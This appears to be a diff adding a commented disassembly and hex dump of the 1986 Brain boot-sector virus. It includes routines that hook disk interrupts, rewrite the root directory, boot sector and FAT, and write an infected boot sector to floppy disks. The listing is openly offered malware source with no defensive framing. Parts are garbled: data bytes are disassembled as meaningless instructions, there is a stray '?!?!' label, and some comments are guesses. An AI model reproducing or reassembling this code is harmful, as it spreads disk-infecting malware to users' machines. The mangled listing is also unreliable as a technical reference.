+ NOP ;05E3 90
+ CALL FUNCTION_1 ;BX = (CX*3)/2
+ MOV AX,[BX+SI] ;05E7 8B00
+ AND AX,000F ;05E9 250F00
+ OR AX,FF70 ;05EC 0D70FF
+ MOV [BX+SI],AX ;05EF 8900
+ MOV [BX+SI+0400],AX ;05F1 89800004
+ POP DX ;05F5 5A
+ POP CX ;05F6 59
+ RET ;05F7 C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ PUSH CX ;05F8 51
+ MOV SI,06BE ;05F9 BEBE06
+ MOV AL,CL ;05FC 8AC1
+ SHR AL,1 ;05FE D0E8
+ JB L060D ;0600 720B
+ CALL
FUNCTION_1 ;BX = (CX*3)/2
+ MOV AX,[BX+SI] ;0605 8B00
+ AND AX,0FFF ;0607 25FF0F
+ JMP L0619 ;060A EB0D
+ ;
+L060D: CALL FUNCTION_1 ;BX = (CX*3)/2
+ MOV AX,[BX+SI] ;0610 8B00
+ AND AX,FFF0 ;0612 25F0FF
+ MOV CL,04 ;0615 B104
+ SHR AX,CL ;0617 D3E8
+L0619: POP CX ;0619 59
+ RET ;061A C3
+ ;
+;-----------------------------------------------------------------------;
+; BX = (CX*3)/2 ;
+;-----------------------------------------------------------------------;
+FUNCTION_1: ;061B
+ PUSH DX ;
+ MOV AX,3 ;
+ MUL CX ;
+ SHR AX,1 ;
+ MOV BX,AX ;
+ POP DX ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+READ_VERIFY: ;0627
+ MOV AH,2 ;
+ CALL VERIFY_SECTORS ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+WRITE_VERIFY: ;062D
+ MOV AH,03 ;
+ CALL VERIFY_SECTORS ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+VERIFY_SECTORS: ;0633
+ MOV CX,4 ;RETRY = 4
+L0636: PUSH CX ;
+ PUSH AX ;
+ MOV AH,0 ;REST
+ INT 6DH ;
+ POP AX ;
+ JB L0653 ;
+ MOV BX,offset L06BEH ;
+ MOV AL,4 ;4==VERIFY
+ MOV DH,00 ;HEAD 0
+ MOV DL,[0226] ;DRIVE DL
+ MOV CX,0002 ;TRACK 0/SECTOR 2
+ PUSH AX ;
+ INT 6DH ;
+ POP AX ;
+ JNB L065C ;IF ERROR...EXIT
+L0653: POP CX ;
+ LOOP L0636 ;RETRY
+ POP AX ;
+ POP AX ;
+ MOV AL,2 ;BAD ADDRESS MARK ???
+ STC ;RETURN ERROR
+ RET ;
+ ;
+L065C: POP CX ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; CONVERT CLUSTERS TO TRACK/SECTOR/HEAD ???? ;
+;-----------------------------------------------------------------------;
+CONVERT_1: ;065E
+ PUSH CX ;
+ SUB CX,2 ;
+ SHL CX,1 ;WORD PTR
+ ADD CX,9*2 ; (SECTORS PER CYLINDER ???)
+ MOV AX,CX ;
+ MOV CL,9*2 ; (SECTORS PER CYLINDER ???)
+ DIV CL ;
+ MOV DS:[0008],AL ;AL = TRACK
+ MOV Byte Ptr DS:[0006],0 ;INC. HEAD
+ INC AH ;INC. SECTOR
+ CMP AH,9 ;IF TOO BIG...
+ JBE L0684 ;
+ SUB AH,9 ;...START AT ZERO
+ MOV Byte Ptr DS:[0006],1 ;INC. HEAD
+L0684: MOV DS:[0007],AH ;
+ POP CX ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ ADD [BX+SI],AL ;068A 0000
+ ADD [BX+SI],AL ;068C 0000
+ ADD [BX+SI],AL ;068E 0000
+ ADD BP,[SI+00] ;0690 036C00
+ ADD AX,[BP+DI] ;0693 0303
+ MOV SI,010E ;0695 BE0E01
+ ADD [BX+SI],AL ;0698 0000
+ ADD AX,SP ;069A 01E0
+ FCOMP DWord Ptr [DI+E0D7] ;069C D89DD7E0
+ LAHF ;06A0 9F
+ LEA BX,[BX+SI+8E9F] ;06A1 8D989F8E
+ LOOPNZ ;06C7 ;06A5 E020
+ SUB [BP+DI+29],AH ;06A7 286329
+ AND [BP+SI+72],AL ;06AA 204272
+ POPA ;06AD 61
+ IMUL BP,[BP+20],E824 ;06AE 696E2024E8
+ FILD DWord Ptr [BX+SI] ;06B3 DB00
+ JB L06C1 ;06B5 720A
+ PUSH DI ;06B7 57
+ CALL ;06DA ;06B8 E81F00
+ POP DI ;06BB 5F
+ JB L06C1 ;06BC 7203
+ CALL WRITE_RBF ;WRITE ROOT BOOT FAT
+L06C1: RET ;06C1 C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ MOV BX,049B ;06C2 BB9B04
+ MOV CX,000B ;
+L06C8: MOV AL,[BX] ;
+ NEG AL ;
+ MOV [SI],AL ;
+ INC SI ;
+ INC BX ;
+ LOOP L06C8 ;
+ ;
+ MOV AL,08 ;
+ MOV [SI],AL ;
+ CLC ;
+ RET ;06D7 C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ MOV Byte Ptr [06C7],91 ;06D8 C606C70691
+ ADD AL,6C ;06DD 046C
+ ADD [BP+06FE],BH ;06DF 00BEFE06
+ MOV [0493],DX ;06E3 89169304
+ MOV AX,[0491] ;06E7 A19104
+ SHR AX,1 ;06EA D1E8
+ MOV [0497],AX ;06EC A39704
+ SHR AX,1 ;06EF D1E8
+ MOV [0495],AX ;06F1 A39504
+ XCHG AX,CX ;06F4 91
+ AND CL,43 ;06F5 80E143
+ MOV DI,[0495] ;06F8 8B3E9504
+ ADD DI,01E3 ;06FC 81C7E301
+ MOV AL,[SI] ;0700 8A04
+ CMP AL,00 ;0702 3C00
+ JZ ;071B ;0704 7415
+ MOV AL,[SI+0B] ;0706 8A440B
+ AND AL,08 ;0709 2408
+ CMP AL,08 ;070B 3C08
+ JZ ;071B ;070D 740C
+ ADD SI,+20 ;070F 83C620
+ DEC Word Ptr [0491] ;0712 FF0E9104
+ JNZ ;0700 ;0716 75E8
+ STC ;0718 F9
+ RET ;0719 C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+: ;071A
+ MOV CX,[BP+DI+331D] ;
+ PUSH DS ;071E 1E
+ XCHG AX,DI ;071F 97
+ ADD AL,89 ;0720 0489
+ XCHG AX,DI ;0722 3697
+ ADD AL,FA ;0724 04FA
+ MOV AX,SS ;0726 8CD0
+ MOV SS:[0493],AX ;0728 A39304
+ MOV [0495],SP ;072B 89269504
+ MOV AX,CS ;072F 8CC8
+ MOV SS,AX ;0731 8ED0
+ MOV SP,[0497] ;0733 8B269704
+ ADD SP,+0C ;0737 83C40C
+ MOV CL,51 ;073A B151
+ ADD DX,444C ;073C 81C24C44
+ MOV DI,2555 ;0740 BF5525
+ MOV CX,0C03 ;0743 B9030C
+ REPZ ;0746 F3
+ CMPSW ;0747 A7
+ MOV AX,0B46 ;0748 B8460B
+ MOV CX,0003 ;074B B90300
+ ROL AX,CL ;074E D3C0
+ MOV [0497],AX ;0750 A39704
+ MOV CX,0005 ;0753 B90500
+ MOV DX,0008 ;0756 BA0800
+ SUB Word Ptr [0497],5210 ;0759 812E97041052
+ PUSH [0497] ;075F FF369704
+L0763: MOV AH,[BX] ;0763 8A27
+ INC BX ;0765 43
+ MOV DL,AH ;0766 8AD4
+ SHL DL,1 ;0768 D0E2
+ JB L0763 ;076A 72F7
+L076C: MOV DL,[BX] ;076C 8A17
+ INC BX ;076E 43
+ MOV AL,DL ;076F 8AC2
+ SHL DL,1 ;0771 D0E2
+ JB L076C ;0773 72F7
+ ADD AX,1D1D ;0775 051D1D
+ PUSH AX ;0778 50
+ INC Word Ptr [0497] ;0779 FF069704
+ JNB L0780 ;077D 7301
+ JMP 268B:E1E2 ;077F EAE2E18B26
+ ;
+ XCHG AX,BP ;0784 95
+ ADD AL,A1 ;0785 04A1
+ XCHG AX,BX ;0787 93
+ ADD AL,8E ;0788 048E
+ SAR BL,1 ;078A D0FB
+ ADD DH,[BP+SI] ;078C 0232
+ CLC ;078E F8
+ RET ;078F C3
+ ;
+;-----------------------------------------------------------------------;
+; READ ROOT, BOOT, FIRST FAT ;
+;-----------------------------------------------------------------------;
+READ_RBF: ;0790
+ MOV Byte Ptr [0490],02 ;COMMAND = READ
+ JMP ROOT_BOOT_FAT ;DO IT
+ ;
+;-----------------------------------------------------------------------;
+;
WRITE ROOT, BOOT, FIRST FAT ;
+;-----------------------------------------------------------------------;
+WRITE_RBF: ;0798
+ MOV Byte Ptr [0490],03 ;COMMAND = WRITE
+ JMP ROOT_BOOT_FAT ;DO IT
+ ;
+;-----------------------------------------------------------------------;
+; READ OR WRITE ROOT, BOOT, FIRST FAT ;
+;-----------------------------------------------------------------------;
+ROOT_BOOT_FAT: ;07A0
+ MOV DH,0 ;HEAD = 0
+ MOV DL,[226H] ;DL = DRIVE
+ MOV CX,6 ;(TRACK 0/SECTOR 6) == ENTIRE ROOT DIR
+ MOV AH,[490H] ;AH = COMMAND
+ MOV AL,4 ;4 SECTORS
+ MOV BX,6BEH ;ES:BX = DTA
+ CALL RESET_DO_IT ;GO TO DISK
+ JB L07C9 ;IF ERROR...EXIT
+ ;
+ MOV CX,1 ;(TRACK 0/SECTOR 1) == BOOT & FAT1
+ MOV DH,1 ;HEAD 1
+ MOV AH,[490H] ;AH = COMMAND
+ MOV AL,3 ;3 SECTORS
+ ADD BX,800H ;ES:BX = DTA
+ CALL RESET_DO_IT ;GO TO DISK
+L07C9: RET ;
+ ;
+;-----------------------------------------------------------------------;
+; RESET DRIVE BEFORE DOING SPECIFIED FUNCTION ;
+;-----------------------------------------------------------------------;
+RESET_DO_IT: ;07CA
+ MOV [0493],AX ;
+ MOV [0495],BX ;SAVE REGs
+ MOV [0497],CX ;
+ MOV [0499],DX ;
+ MOV CX,0004 ;RETRY COUNT = 4
+ ;
+RDI_10: PUSH CX ;
+ MOV AH,00 ;REST DRIVE
+ INT 6D ;
+ JB RDI_80 ;IF ERROR...RETRY
+ MOV AX,[0493] ;RESTORE REGs
+ MOV BX,[0495] ;
+ MOV CX,[0497] ;
+ MOV DX,[0499] ;
+ INT 6D ;DO SPECIFIED FUNCTION
+ JNB RDI_90 ;IF NO ERROR...EXIT
+RDI_80: POP CX ;
+ LOOP RDI_10 ;RETRY
+ STC ;RETURN ERROR
+ RET ;
+ ;
+RDI_90: POP CX ;RETURN NO ERROR
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ ADD [BX+SI],AL ;07FD 0000
+ ADD [BP+DI],AL ;07FF 0003
+ ADD [BX+DI],AL ;0801 0001
+
+L0804: ?!?!
+
+
+
+
+ ADD BP,AX ;0803 03E8
+ DEC CX ;0805 49
+ STD ;0806 FD
+ JB ;085D ;0807 7254
+ ;
+ MOV Word Ptr [000A],0001 ;
+ MOV Byte Ptr [0009],00 ;
+ MOV BX,06BE ;ES:BX = DTA ?
+ CALL READ_SECTORS ;
+ ;
+ MOV BX,06BE ;BX = DTA
+ MOV AX,[0007] ;GET SECTOR TRACK
+ MOV [000A],AX ;SAVE SECTOR/TRACK
+ MOV AH,[0006] ;GET HEAD
+ MOV [0009],AH ;SAVE HEAD
+ CALL WRITE_SECTORS ;WRITE SECTOR(S)
+ CALL NEXT_SECTOR ;POINT TO NEXT
+ ;
+ MOV CX,0005 ;CX = ???
+ MOV BX,0200 ;BX = DTA
+L0837: MOV [0600],CX ;SAVE ???
+ CALL WRITE_SECTORS ;WRITE SECTOR(S)
+ CALL NEXT_SECTOR ;POINT TO NEXT
+ ADD BX,512 ;DTA += 512
+ MOV CX,[0600] ;???
+ LOOP L0837 ;LOOP 5 TIMES ???
+ ;
+ MOV Byte Ptr [0009],00 ;HEAD = 0
+ MOV Word Ptr [000A],0001 ;TRACK/SECTOR = 0/1
+ MOV BX,0000 ;DTA = INFECTED BOOT SECTOR
+ CALL WRITE_SECTORS ;WRITE INFECTED BOOT SECTOR
+ CLC ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+READ_SECTORS: ;085E
+ MOV Word Ptr [0602H],0201H ;READ CMD/1 SECTOR
+ JMP DO_SECTORS ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+WRITE_SECTORS: ;0867
+ MOV Word Ptr [0602H],0301H ;WRITE CMD/1 SECTOR
+ JMP DO_SECTORS ;
+ ;
+;-----------------------------------------------------------------------;
+; READ OR WRITE SOME SECTORS WITH A RETRY COUNT OF 4 ;
+; ;
+; ON ENTRY: DS:[601H] = COMMAND ;
+; DS:[602H] = SECTOR COUNT ;
+; DS:[226H] = DRIVE ;
+; DS:[0009] = HEAD ;
+; DS:[000A] = SECTOR ;
+; DS:[000B] = TRACK ;
+;-----------------------------------------------------------------------;
+DO_SECTORS: ;0870
+ PUSH BX ;
+ MOV CX,4 ;RETRY COUNT = 4
+ ;
+D1S_10: PUSH CX ;
+ MOV DH,[9] ;HEAD = 9
+ MOV DL,[226H] ;DRIVE
+ MOV CX,[10] ;TRACK/SECT
+ MOV AX,[602H] ;COMMAND/COUNT
+ INT 6DH ;(SAME AS INT 13)
+ JNB D1S_80 ;
+ ;
+ MOV AH,00 ;RESET
+ INT 6DH ;(SAME AS INT 13)
+ POP CX ;
+ LOOP D1S_10 ;TRY AGAIN
+ POP BX ;
+ POP BX ;
+ STC ;RETURN ERROR
+ RET ;
+ ;
+D1S_80: POP CX ;0893 59
+ POP BX ;0894 5B
+ RET ;0895 C3
+ ;
+;-----------------------------------------------------------------------;
+; INC. NEXT SECTOR ;
+; ON ENTRY: DS:[0009] = HEAD ;
+; DS:[000A] = SECTOR ;
+; DS:[000B] = TRACK ;
+;-----------------------------------------------------------------------;
+NEXT_SECTOR: ;0896
+ INC Byte Ptr [10] ;SECTOR
+ CMP Byte Ptr [10],10 ;
+ JNZ NS_90 ;
+ MOV Byte Ptr [10],1 ;
+ INC Byte Ptr [9] ;HEAD
+ CMP Byte Ptr [9],2 ;
+ JNZ NS_90 ;
+ MOV Byte Ptr [9],0 ;
+ INC Byte Ptr [11] ;TRACK
+NS_90: RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ DB 64 ;08BB 'dtk'
+ JZ ;091F ;
+ ;
+;---------------------------------------;
+ JMP CONTINUE_4 ;08FA
+ ;
+ DB 'IBM X3.2' ;OEM NAME AND VERSION
+ ;
+ DW 512 ;BYTES PER SECTOR
+ DB 2 ;SECTORS PER ALLOCATION UNIT
+ DW 1 ;RESERVED SECTORS
+ DB 2 ;NUMBER OF FATS
+ DW 112 ;NUMBER OF ROOT DIR ENTRIES
+ DW 2D0H ;SECTORS PER DISK
+ DB 0FDH ;MEDIA ID
+ DW 2 ;SECTORS PER FAT
+ DW 9 ;SECTORS PER TRACK
+ DW 2 ;NUMBER OF HEADS
+ DW 0 ;HIDDEN SECTORS
+ ;
+;---------------------------------------;
+ DB 0,0
+ DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0
+
+ DB 002H,0DFH
+ DB 002H,025H,002H,012H
+ DB 02AH,0FFH,050H,0F6H
+ DB 000H,002H,
+
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ INT 19H ;REBOOT
+ ;
+L08FA: CLI ;08FA FA
+ XOR AX,AX ;08FB 33C0
+ MOV ES,AX ;08FD 8EC0
+ MOV SS,AX ;08FF 8ED0
+ MOV SP,7C00 ;0901 BC007C
+ MOV DS,AX ;0904 8ED8
+ MOV BX,07C0 ;0906 BBC007
+ MOV Word Ptr [0078],002F ;0909 C70678002F00
+ MOV [007A],BX ;090F 891E7A00
+ MOV DS,BX ;0913 8EDB
+ MOV DX,[001E] ;0915 8B161E00
+ MOV [0020],DL ;0919 88162000
+ INT 13 ;GO TO DISK
+ JNB ;0924 ;091F 7303
+ JMP ;09FC ;0921 E9D800
+ MOV SI,000B ;0924 BE0B00
+ MOV CX,[SI] ;0927 8B0C
+ SHR CH,1 ;0929 D0ED
+ XCHG CH,CL ;092B 86E9
+ MOV [002B],CX ;092D 890E2B00
+ MOV AL,[SI+05] ;0931 8A4405
+
XOR AH,AH ;0934 32E4 + MUL Word Ptr [SI+0B] ;0936 F7640B + ADD AX,[SI+03] ;0939 034403 + ADD AX,[SI+11] ;093C 034411 + MOV [0024],AX ;093F A32400 + MOV BX,7E00 ;0942 BB007E + CALL 0A24 ;0945 E8DC00 + MOV BX,ES ;0948 8CC3 + MOV AX,0070 ;094A B87000 + MOV ES,AX ;094D 8EC0 + MOV AX,0020 ;094F B82000 + MUL Word Ptr [SI+06] ;0952 F76406 + MOV CX,[SI] ;0955 8B0C + ADD AX,CX ;0957 03C1 + DEC AX ;0959 48 + DIV CX ;095A F7F1 + ADD [0024],AX ;095C 01062400 + MOV CL,[002A] ;0960 8A0E2A00 + MOV AX,[0024] ;0964 A12400 + CALL ;0971 ;0967 E80700 + PUSH ES ;096A 06 + POP DS ;096B 1F + JMP 0070:0000 ;096C EA00007000 + ; +;HEAVY NUMBER CRUNCHING HERE ; + PUSH BX ;0971 53 + PUSH AX ;0972 50 + MOV AL,CL ;0973 8AC1 + MUL Byte Ptr [002B] ;0975 F6262B00 + MOV [0029],AL ;0979 A22900 + POP AX ;097C 58 + MUL Word Ptr [002B] ;097D F7262B00 + DIV Word Ptr [SI+0D] ;0981 F7740D + INC DL ;0984 FEC2 + MOV [0028],DL ;0986 88162800 + PUSH DX ;098A 52 + XOR DX,DX ;098B 33D2 + DIV Word Ptr [SI+0F] ;098D F7740F + MOV [0021],DL ;0990 88162100 + MOV [0026],AX ;0994 A32600 + POP DX ;0997 5A + MOV CL,[0029] ;0998 8A0E2900 + ADD DL,CL ;099C 02D1 + MOV AX,[SI+0D] ;099E 8B440D + INC AX ;09A1 40 + CMP DL,AL ;09A2 3AD0 + JBE ;09AC ;09A4 7606 + SUB AL,[0028] ;09A6 2A062800 + MOV CL,AL ;09AA 8AC8 + MOV AL,CL ;09AC 8AC1 + MOV DX,[0026] ;09AE 8B162600 + MOV CL,06 ;09B2 B106 + SHL DH,CL ;09B4 D2E6 + OR DH,[0028] ;09B6 0A362800 + MOV CX,DX ;09BA 8BCA + XCHG CH,CL ;09BC 86E9 + MOV DX,[0020] ;09BE 8B162000 + MOV AH,02 ;READ SECTOR + PUSH AX ; + INT 13 ; + POP AX ;09C7 58 + JB ;09FC ;09C8 7232 + SUB [0029],AL ;09CA 28062900 + JBE ;09F5 ;09CE 7625 + CBW ;09D0 98 + MUL Word Ptr [002D] ;09D1 F7262D00 + ADD BX,AX ;09D5 03D8 + INC Byte Ptr [0021] ;09D7 FE062100 + MOV DL,[0021] ;09DB 8A162100 + CMP DL,[SI+0F] ;09DF 3A540F + MOV DL,01 ;09E2 B201 + MOV [0028],DL ;09E4 88162800 + JB ;0998 ;09E8 72AE + MOV Byte Ptr [0021],00 ;09EA C606210000 + INC Word Ptr [0026] ;09EF FF062600 + JMP ;0998 ;09F3 EBA3 + POP BX ;09F5 5B + RET 
;09F6 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + MOV SI,01B3 ;09F7 BEB301 + JMP ;09FF ;09FA EB03 + MOV SI,01C5 ;09FC BEC501 + CALL L0A15 ;09FF E81300 + MOV SI,01D4 ;0A02 BED401 + CALL L0A15 ;0A05 E80D00 + MOV AH,00 ;0A08 B400 + INT 16 ;0A0A CD16 + MOV AH,01 ;0A0C B401 + INT 16 ;0A0E CD16 + JNZ 0A0C ;0A10 75FA + JMP ;08F8 ;0A12 E9E3FE + ; +L0A15: LODSB ;L0A15 + OR AL,AL ;0A16 0AC0 + JZ 0A23 ;0A18 7409 + MOV AH,0E ;0A1A B40E + MOV BX,0007 ;0A1C BB0700 + INT 10 ;0A1F CD10 + JMP L0A15 ;0A21 EBF2 + RET ;0A23 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + + MOV CL,01 ;0A24 B101 + CALL ;0971 ;0A26 E848FF + PUSH SI ;0A29 56 + MOV DI,BX ;0A2A 8BFB + MOV AX,ES:[BX+1C] ;0A2C 268B471C + XOR DX,DX ;0A30 33D2 + DIV Word Ptr [SI] ;0A32 F734 + INC AL ;0A34 FEC0 + MOV [002A],AL ;0A36 A22A00 + MOV SI,019D ;0A39 BE9D01 + MOV CX,000B ;0A3C B90B00 + REPZ ;0A3F F3 + CMPSB ;0A40 A6 + JNZ ;09F7 ;0A41 75B4 + MOV AX,ES:[BX+3A] ;0A43 268B473A + MOV [0022],AX ;0A47 A32200 + MOV DI,BX ;0A4A 8BFB + ADD DI,+20 ;0A4C 83C720 + MOV SI,01A8 ;0A4F BEA801 + MOV CX,000B ;0A52 B90B00 + REPZ ;0A55 F3 + CMPSB ;0A56 A6 + JNZ ;09F7 ;0A57 759E + POP SI ;0A59 5E + RET ;0A5A C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CODE ENDS ; + END ; + +0390 49 42 4D IBM +03A0 42 49 4F 20 20 43 4F 4D-49 42 4D 44 4F 53 20 20 BIO COMIBMDOS +03B0 43 4F 4D 0D 0A 4E 6F 6E-2D 53 79 73 74 65 6D 20 COM..Non-System +03C0 64 69 73 6B 00 0D 0A 42-4F 4F 54 20 66 61 69 6C disk...BOOT fail +03D0 75 72 65 00 0D 0A 52 65-70 6C 61 63 65 20 61 6E ure...Replace an +03E0 64 20 70 72 65 73 73 20-61 6E 79 20 6B 65 79 20 d press any key +03F0 77 68 65 6E 20 72 65 61-64 79 00 90 90 90 55 AA when 
ready....U* +0400 EB 26 28 63 29 20 31 39-38 36 20 42 61 73 69 74 k&(c) 1986 Basit +0410 20 26 20 41 6D 6A 61 64-73 20 28 70 76 74 29 20 & Amjads (pvt) +0420 4C 74 64 20 00 04 00 00-2E C6 06 25 02 1F 33 C0 Ltd .....F.%..3@ +0430 8E D8 A1 4C 00 A3 B4 01-A1 4E 00 A3 B6 01 B8 76 .X!L.#4.!N.#6.8v +0440 02 A3 4C 00 8C C8 A3 4E-00 B9 04 00 33 C0 8E C0 .#L..H#N.9..3@.@ +0450 51 2E 8A 36 06 00 B2 00-2E 8B 0E 07 00 B8 01 02 Q..6..2......8.. +0460 BB 00 7C CD 6D 73 09 B4-00 CD 6D 59 E2 E2 CD 18 ;.|Mms.4.MmYbbM. +0470 EA 00 7C 00 00 90 FB 80-FC 02 75 18 80 FA 02 77 j.|...{.|.u..z.w +0480 13 80 FD 00 75 05 80 FE-00 74 0C 2E FE 0E 25 02 ..}.u..~.t..~.%. +0490 75 02 EB 03 E9 A5 00 2E-C6 06 27 02 00 2E C6 06 u.k.i%..F.'...F. +04A0 25 02 04 50 53 51 52 2E-88 16 26 02 B9 04 00 51 %..PSQR...&.9..Q +04B0 B4 00 CD 6D 72 15 B6 00-B9 01 00 BB BE 06 06 8C 4.Mmr.6.9..;>... +04C0 C8 8E C0 B8 01 02 CD 6D-07 73 06 59 E2 E1 EB 2F H.@8..Mm.s.Ybak/ +04D0 90 59 2E A1 C2 06 3D 34-12 75 08 2E C6 06 27 02 .Y.!B.=4.u..F.'. +04E0 01 EB 20 1E 06 8C C8 8E-D8 8E C0 56 E8 15 03 72 .k ...H.X.@Vh..r +04F0 09 2E C6 06 27 02 02 E8-B8 01 5E 07 1F 73 04 B4 ..F.'..h8.^..s.4 +0500 00 CD 6D 5A 59 5B 58 83-F9 01 75 30 80 FE 00 75 .MmZY[X.y.u0.~.u +0510 2B 2E 80 3E 27 02 01 75-11 2E 8B 0E C5 06 2E 8B +..>'..u....E... +0520 16 C3 06 2E 8A 16 26 02-EB 12 2E 80 3E 27 02 02 .C....&.k...>'.. +0530 75 0A 2E 8B 0E 07 00 2E-8A 36 06 00 CD 6D CA 02 u........6..MmJ. +0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0550 EB 25 90 03 00 20 28 63-29 20 31 39 38 36 20 42 k%... (c) 1986 Basit & Amjads (pvt) Ltd +0560 61 73 69 74 20 26 20 41-6D 6A 61 64 73 20 28 70 +0570 76 74 29 20 4C 74 64 E8-AD 00 A1 BE 06 3D FD FF h-.!>.=}. +0580 74 04 B0 03 F9 C3 B9 37-00 C7 06 53 03 00 00 E8 t.0.yC97.G.S...h +0590 66 00 3D 00 00 75 0E FF-06 53 03 83 3E 53 03 03 f.=..u...S..>S.. +05A0 75 09 EB 12 90 C7 06 53-03 00 00 41 81 F9 63 01 u.k..G.S...A.yc. 
+05B0 75 DD B0 01 F9 C3 B2 03-E8 10 00 49 FE CA 75 F8 u]0.yC2.h..I~Jux +05C0 41 E8 9A 00 E8 66 00 B0-00 F8 C3 51 52 BE BE 06 Ah..hf.0.xCQR>>. +05D0 8A C1 D0 E8 72 0E E8 42-00 8B 00 25 00 F0 0D F7 .APhr.hB...%.p.w +05E0 0F EB 0C 90 E8 34 00 8B-00 25 0F 00 0D 70 FF 89 .k..h4...%...p.. +05F0 00 89 80 00 04 5A 59 C3-51 BE BE 06 8A C1 D0 E8 .....ZYCQ>>..APh +0600 72 0B E8 16 00 8B 00 25-FF 0F EB 0D 90 E8 0B 00 r.h....%..k..h.. +0610 8B 00 25 F0 FF B1 04 D3-E8 59 C3 52 B8 03 00 F7 ..%p.1.ShYCR8..w +0620 E1 D1 E8 8B D8 5A C3 B4-02 E8 07 00 C3 B4 03 E8 aQh.XZC4.h..C4.h +0630 01 00 C3 B9 04 00 51 50-B4 00 CD 6D 58 72 14 BB ..C9..QP4.MmXr.; +0640 BE 06 B0 04 B6 00 8A 16-26 02 B9 02 00 50 CD 6D >.0.6...&.9..PMm +0650 58 73 09 59 E2 E0 58 58-B0 02 F9 C3 59 C3 51 83 Xs.Yb`XX0.yCYCQ. +0660 E9 02 D1 E1 83 C1 0C 8B-C1 B1 12 F6 F1 A2 08 00 i.Qa.A..A1.vq".. +0670 C6 06 06 00 00 FE C4 80-FC 09 76 08 80 EC 09 C6 F....~D.|.v..l.F +0680 06 06 00 01 88 26 07 00-59 C3 00 00 00 00 00 00 .....&..YC...... +0690 03 6C 00 03 03 BE 0E 01-00 00 01 E0 D8 9D D7 E0 .l...>.....`X.W` +06A0 9F 8D 98 9F 8E E0 20 28-63 29 20 42 72 61 69 6E .....` (c) Brain +06B0 20 24 E8 DB 00 72 0A 57-E8 1F 00 5F 72 03 E8 D7 $h[.r.Wh.._r.hW +06C0 00 C3 BB 9B 04 B9 0B 00-8A 07 F6 D8 88 04 46 43 .C;..9....vX..FC +06D0 E2 F6 B0 08 88 04 F8 C3-C6 06 C7 06 91 04 6C 00 bv0...xCF.G...l. +06E0 BE FE 06 89 16 93 04 A1-91 04 D1 E8 A3 97 04 D1 >~.....!..Qh#..Q +06F0 E8 A3 95 04 91 80 E1 43-8B 3E 95 04 81 C7 E3 01 h#....aC.>...Gc. +0700 8A 04 3C 00 74 15 8A 44-0B 24 08 3C 08 74 0C 83 ..<.t..D.$.<.t.. +0710 C6 20 FF 0E 91 04 75 E8-F9 C3 8B 8B 1D 33 1E 97 F ....uhyC...3.. +0720 04 89 36 97 04 FA 8C D0-A3 93 04 89 26 95 04 8C ..6..z.P#...&... +0730 C8 8E D0 8B 26 97 04 83-C4 0C B1 51 81 C2 4C 44 H.P.&...D.1Q.BLD +0740 BF 55 25 B9 03 0C F3 A7-B8 46 0B B9 03 00 D3 C0 ?U%9..s'8F.9..S@ +0750 A3 97 04 B9 05 00 BA 08-00 81 2E 97 04 10 52 FF #..9..:.......R. +0760 36 97 04 8A 27 43 8A D4-D0 E2 72 F7 8A 17 43 8A 6...'C.TPbrw..C. 
+0770 C2 D0 E2 72 F7 05 1D 1D-50 FF 06 97 04 73 01 EA BPbrw...P....s.j +0780 E2 E1 8B 26 95 04 A1 93-04 8E D0 FB 02 32 F8 C3 ba.&..!...P{.2xC +0790 C6 06 90 04 02 EB 09 90-C6 06 90 04 03 EB 01 90 F....k..F....k.. +07A0 B6 00 8A 16 26 02 B9 06-00 8A 26 90 04 B0 04 BB 6...&.9...&..0.; +07B0 BE 06 E8 15 00 72 12 B9-01 00 B6 01 8A 26 90 04 >.h..r.9..6..&.. +07C0 B0 03 81 C3 00 08 E8 01-00 C3 A3 93 04 89 1E 95 0..C..h..C#..... +07D0 04 89 0E 97 04 89 16 99-04 B9 04 00 51 B4 00 CD .........9..Q4.M +07E0 6D 72 13 A1 93 04 8B 1E-95 04 8B 0E 97 04 8B 16 mr.!............ +07F0 99 04 CD 6D 73 05 59 E2-E3 F9 C3 59 C3 00 00 00 ..Mms.YbcyCYC... +0800 03 00 01 03 E8 49 FD 72-54 C7 06 0A 00 01 00 C6 ....hI}rTG.....F +0810 06 09 00 00 BB BE 06 E8-44 00 BB BE 06 A1 07 00 ....;>.hD.;>.!.. +0820 A3 0A 00 8A 26 06 00 88-26 09 00 E8 39 00 E8 65 #...&...&..h9.he +0830 00 B9 05 00 BB 00 02 89-0E 00 06 E8 29 00 E8 55 .9..;......h).hU +0840 00 81 C3 00 02 8B 0E 00-06 E2 EC C6 06 09 00 00 ..C......blF.... +0850 C7 06 0A 00 01 00 BB 00-00 E8 0B 00 F8 C3 C7 06 G.....;..h..xCG. +0860 02 06 01 02 EB 0A 90 C7-06 02 06 01 03 EB 01 90 ....k..G.....k.. +0870 53 B9 04 00 51 8A 36 09-00 8A 16 26 02 8B 0E 0A S9..Q.6....&.... +0880 00 A1 02 06 CD 6D 73 0B-B4 00 CD 6D 59 E2 E5 5B .!..Mms.4.MmYbe[ +0890 5B F9 C3 59 5B C3 FE 